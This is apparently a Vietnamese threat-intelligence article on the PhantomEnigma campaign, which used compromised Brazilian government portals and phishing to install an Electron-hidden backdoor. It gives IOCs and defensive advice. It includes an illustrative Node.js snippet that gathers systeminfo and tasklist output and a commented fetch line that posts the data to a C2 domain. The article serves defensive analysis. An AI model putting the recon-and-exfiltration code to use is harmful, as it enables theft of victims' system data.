Một chiến dịch mã độc đang hoạt động tích cực, được đặt tên là PhantomEnigma, đang lạm dụng cơ sở hạ tầng chính phủ Brazil đã bị xâm nhập để phân phối các payload độc hại và né tránh hiệu quả các cơ chế phát hiện. Chiến dịch này đại diện cho một mối đe dọa mạng nghiêm trọng, nhắm mục tiêu vào các tổ chức tài chính và khu vực công thông qua việc sử dụng các kênh phân phối đáng tin cậy. Sự tinh vi của chiến dịch này cho thấy một sự phối hợp chặt chẽ, từ khâu xâm nhập ban đầu cho đến việc duy trì sự hiện diện lâu dài trong các hệ thống mục tiêu.
Tổng quan về Phương thức Khai thác và Lây nhiễm của PhantomEnigma
Chiến dịch PhantomEnigma đã chiếm quyền điều khiển thành công ít nhất 20 cổng thông tin chính thức của các đô thị và cảnh sát thuộc tên miền “.gov.br”. Các cổng thông tin này, vốn có độ tin cậy cao, sau đó được sử dụng như các điểm phân phối chính cho mã độc, nhắm vào các ngân hàng và các tổ chức thuộc khu vực công. Việc sử dụng cơ sở hạ tầng chính phủ hợp pháp giúp các tác nhân đe dọa ẩn mình trong lưu lượng truy cập đáng tin cậy, làm tăng khả năng thành công của cuộc tấn công mạng.
Kẻ tấn công đã đạt được quyền truy cập vào các hộp thư điện tử chính phủ hợp pháp. Điều này cho phép chúng gửi các email lừa đảo vượt qua các kiểm tra xác thực email quan trọng như SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail) và DMARC (Domain-based Message Authentication, Reporting, and Conformance). Các giao thức này vốn được thiết kế để phát hiện và chặn các email giả mạo hoặc từ người gửi không hợp lệ, nhưng trong trường hợp này, việc chiếm quyền kiểm soát hộp thư hợp pháp đã vô hiệu hóa chúng. Để hiểu rõ hơn về cách các giao thức này hoạt động, bạn có thể tham khảo thêm tại Domain-based Message Authentication, Reporting, and Conformance (DMARC).
Kỹ thuật Lừa đảo và Phân phối Mã độc
Nạn nhân nhận được các email giả mạo, thường mang chủ đề liên quan đến “Polícia Civil” (Cảnh sát Dân sự) hoặc “Procuração Digital” (Giấy ủy quyền điện tử) từ các cơ quan công chứng. Những email này chứa các liên kết độc hại dẫn đến các máy chủ chính phủ đã bị xâm nhập hoặc các tên miền giả mạo được thiết kế để trông giống các trang cảnh sát.
Khi người dùng nhấp vào các liên kết này, một trình cài đặt Inno Setup được biên dịch bằng Delphi sẽ tự động kích hoạt. Trình cài đặt này hoạt động âm thầm, triển khai một ứng dụng Electron đã được sửa đổi, ví dụ như ứng dụng ghi chú Boostnote. Bên trong ứng dụng hợp pháp giả mạo này, một backdoor độc hại dưới dạng file index.js được giấu kín.
Cơ chế Hoạt động của Backdoor và Khả năng Kiểm soát từ xa
Sau khi được kích hoạt trong hệ thống nạn nhân, backdoor index.js sẽ tự động giải mã các thành phần của nó. Sau đó, nó bắt đầu thu thập dữ liệu hệ thống của nạn nhân và truyền về máy chủ Command-and-Control (C2) của kẻ tấn công. Quá trình này được thực hiện một cách bí mật để tránh bị phát hiện.
Để thực hiện trinh sát sâu hơn trên hệ thống bị nhiễm, backdoor sử dụng module child_process của Node.js để thực thi các lệnh hệ thống. Điều này cho phép kẻ tấn công thu thập thông tin chi tiết về môi trường hoạt động, cấu hình mạng và các ứng dụng đã cài đặt. Việc thiết lập khả năng duy trì được thực hiện thông qua việc thêm các mục vào Windows Run key, đảm bảo mã độc khởi chạy lại sau mỗi lần hệ thống khởi động.
// Đoạn mã minh họa cách backdoor có thể thực hiện trinh sát bằng child_process
const { exec } = require('child_process');
function performReconnaissance() {
// Ví dụ: Thu thập thông tin hệ thống
exec('systeminfo', (error, stdout, stderr) => {
if (error) {
console.error(`Lỗi khi thực thi lệnh systeminfo: ${error.message}`);
return;
}
if (stderr) {
console.error(`Lỗi stderr từ systeminfo: ${stderr}`);
return;
}
console.log(`Thông tin hệ thống thu thập được:\n${stdout}`);
sendDataToC2('system_info', stdout); // Gửi thông tin tới C2
});
// Ví dụ: Liệt kê các tiến trình đang chạy
exec('tasklist', (error, stdout, stderr) => {
if (error) {
console.error(`Lỗi khi thực thi lệnh tasklist: ${error.message}`);
return;
}
if (stderr) {
console.error(`Lỗi stderr từ tasklist: ${stderr}`);
return;
}
console.log(`Danh sách tiến trình:\n${stdout}`);
sendDataToC2('process_list', stdout); // Gửi thông tin tới C2
});
}
function sendDataToC2(dataType, data) {
// Thực hiện logic gửi dữ liệu đến máy chủ C2
// Đây chỉ là một hàm giả định
console.log(`Đang gửi dữ liệu ${dataType} đến C2...`);
// Ví dụ: fetch('https://zsxocjarsate[.]com/nbw/', { method: 'POST', body: JSON.stringify({ type: dataType, payload: data }) });
}
// Gọi hàm trinh sát khi backdoor được kích hoạt
performReconnaissance();
Máy chủ C2 có thể phản hồi bằng cách gửi các đoạn mã JavaScript để thực thi trực tiếp trên hệ thống bị nhiễm thông qua hàm eval(). Ngoài ra, nó cũng có thể đẩy các payload thực thi đầy đủ, chẳng hạn như công cụ đánh cắp thông tin (stealer) hoặc công cụ truy cập từ xa (Remote Access Tool – RAT), như một phần của cuộc tấn công mạng giai đoạn hai. Điều này cho phép kẻ tấn công mở rộng khả năng kiểm soát và thực hiện các hành động độc hại đa dạng.
Các Biến thể Mới và Mức độ Tinh vi của Mối đe dọa
Trong quá trình phân tích và thử nghiệm lại trực tiếp vào ngày 12 tháng 7 năm 2026, các nhà phân tích đã phát hiện ra một thế hệ beacon mới chưa từng được ghi nhận trước đây. Biến thể này khác biệt so với phiên bản trước đó, vốn sử dụng yêu cầu GET đến endpoint /laravel.php. Thế hệ mới gửi một yêu cầu POST đến đường dẫn /nbw/ trên máy chủ C2.
Phát hiện này đã xác nhận rằng tên miền C2 trực tiếp zsxocjarsate[.]com đang chủ động nhận dữ liệu hệ thống bị đánh cắp từ các nạn nhân. Điều này chứng tỏ PhantomEnigma hiện đang vận hành ít nhất hai thế hệ backdoor riêng biệt đồng thời, một dấu hiệu rõ ràng về mức độ tinh vi và khả năng thích ứng của mối đe dọa mạng này. Việc duy trì nhiều biến thể giúp kẻ tấn công tăng khả năng né tránh và mở rộng phạm vi hoạt động.
Bên cạnh đó, các nhà nghiên cứu cũng đã liên kết một chiến dịch lừa đảo QR code (quishing) riêng biệt với cùng một tác nhân đe dọa. Chiến dịch này sử dụng các tài liệu PDF giả mạo “Ofício Polícia Civil” để lừa đảo nạn nhân. Việc sử dụng đa dạng các phương thức tấn công cho thấy chiến dịch này được tổ chức rất bài bản.
Ít nhất bốn máy chủ chính phủ bị xâm nhập, bao gồm protocolo.sorocaba.sp.gov[.]br và prodoc.ap.gov[.]br, đã được sử dụng để phân phối cả nội dung liên quan đến “Ofício-PC” và trình cài đặt PhantomEnigma. Điều này củng cố mạnh mẽ đánh giá rằng đây không phải là các hoạt động riêng lẻ mà là hai nhánh của một chiến dịch phối hợp, được điều khiển bởi cùng một tác nhân đe dọa nhằm gây ra mối đe dọa mạng rộng lớn.
Indicators of Compromise (IOCs) Liên quan đến PhantomEnigma
Để hỗ trợ việc phát hiện và ứng phó, dưới đây là các IOCs chính được xác định liên quan đến chiến dịch PhantomEnigma. Việc giám sát và chặn các chỉ số này là rất quan trọng để giảm thiểu rủi ro từ mã độc này.
- Tên miền Command-and-Control (C2):
zsxocjarsate[.]compoliciacivilmg[.]com
- Máy chủ Chính phủ bị xâm nhập (ví dụ điển hình):
protocolo.sorocaba.sp.gov[.]brprodoc.ap.gov[.]br- Ngoài ra, còn ít nhất 20 cổng thông tin chính thức .gov.br khác đã bị khai thác.
- Chuỗi xây dựng đặc trưng của mã độc:
- Sử dụng Delphi/Inno Setup kết hợp với Node.js/Electron (đặc biệt là backdoor
index.js).
- Sử dụng Delphi/Inno Setup kết hợp với Node.js/Electron (đặc biệt là backdoor
Thách thức trong Phát hiện và Chiến lược Phòng ngừa
Một trong những thách thức lớn nhất trong việc đối phó với chiến dịch PhantomEnigma là khả năng xoay vòng các tên miền và địa chỉ IP C2 của nó gần như hàng tuần. Điều này khiến các danh sách chặn tĩnh trở nên lỗi thời rất nhanh chóng, làm giảm hiệu quả của các biện pháp phòng thủ truyền thống. Ví dụ, tên miền seed được trích dẫn nhiều nhất, policiacivilmg[.]com, chỉ xuất hiện trong 15% trong số 231 phiên sandbox được phân tích, cho thấy việc phát hiện dựa trên tên miền đơn thuần đã bỏ lỡ tới hai phần ba hoạt động của mã độc này.
Điểm đáng chú ý là chuỗi xây dựng lặp lại của mã độc, bao gồm sự kết hợp giữa Delphi/Inno Setup và Node.js/Electron, đã phục vụ như một dấu vân tay bền vững nhất. Đặc điểm này đã cho phép các nhà nghiên cứu xác định tất cả 231 phiên liên quan, ngay cả khi cơ sở hạ tầng mạng của kẻ tấn công liên tục thay đổi. Việc tập trung vào dấu hiệu kỹ thuật cốt lõi này là chìa khóa để nhận diện mối đe dọa mạng dai dẳng này.
Ban đầu, gần một phần ba các mẫu độc hại đã nhận được đánh giá “sạch” từ các công cụ phân tích tự động, dẫn đến sự chậm trễ trong việc ngăn chặn và ứng phó. Việc lạm dụng cơ sở hạ tầng chính phủ đáng tin cậy để phân phối mã độc tạo ra nhiều rủi ro nghiêm trọng. Chúng bao gồm gian lận ngân hàng, rò rỉ dữ liệu nhạy cảm, gián đoạn hoạt động của các dịch vụ công và gia tăng đáng kể chi phí ứng phó sự cố an ninh. Đây là một khía cạnh nguy hiểm của tấn công mạng.
Khuyến nghị Bảo vệ và Tăng cường An ninh
Các chuyên gia bảo mật và lãnh đạo an ninh được khuyến nghị nên áp dụng cách tiếp cận khác biệt khi xử lý các máy chủ .gov.br và .jus.br đã bị xâm nhập so với cơ sở hạ tầng thuộc sở hữu trực tiếp của kẻ tấn công. Việc chặn hoàn toàn các tên miền chính phủ có thể vô tình làm gián đoạn các dịch vụ công hợp pháp, gây ra hậu quả không mong muốn. Do đó, cần có một chiến lược phân biệt rõ ràng để đối phó với mối đe dọa mạng này.
Để đạt được khả năng bảo vệ bền vững và hiệu quả hơn chống lại các chiến dịch như PhantomEnigma, cần kết hợp nhiều phương pháp. Điều này bao gồm phân tích hành vi nâng cao trong môi trường sandbox, sử dụng các quy tắc YARA để săn lùng chuỗi xây dựng đặc trưng của mã độc, và tích hợp các nguồn cấp dữ liệu threat intelligence được cập nhật liên tục. Cách tiếp cận đa lớp này sẽ hiệu quả hơn nhiều so với việc chỉ dựa vào các tên miền hoặc hash riêng lẻ để phát hiện và ngăn chặn các cuộc tấn công mạng tinh vi.










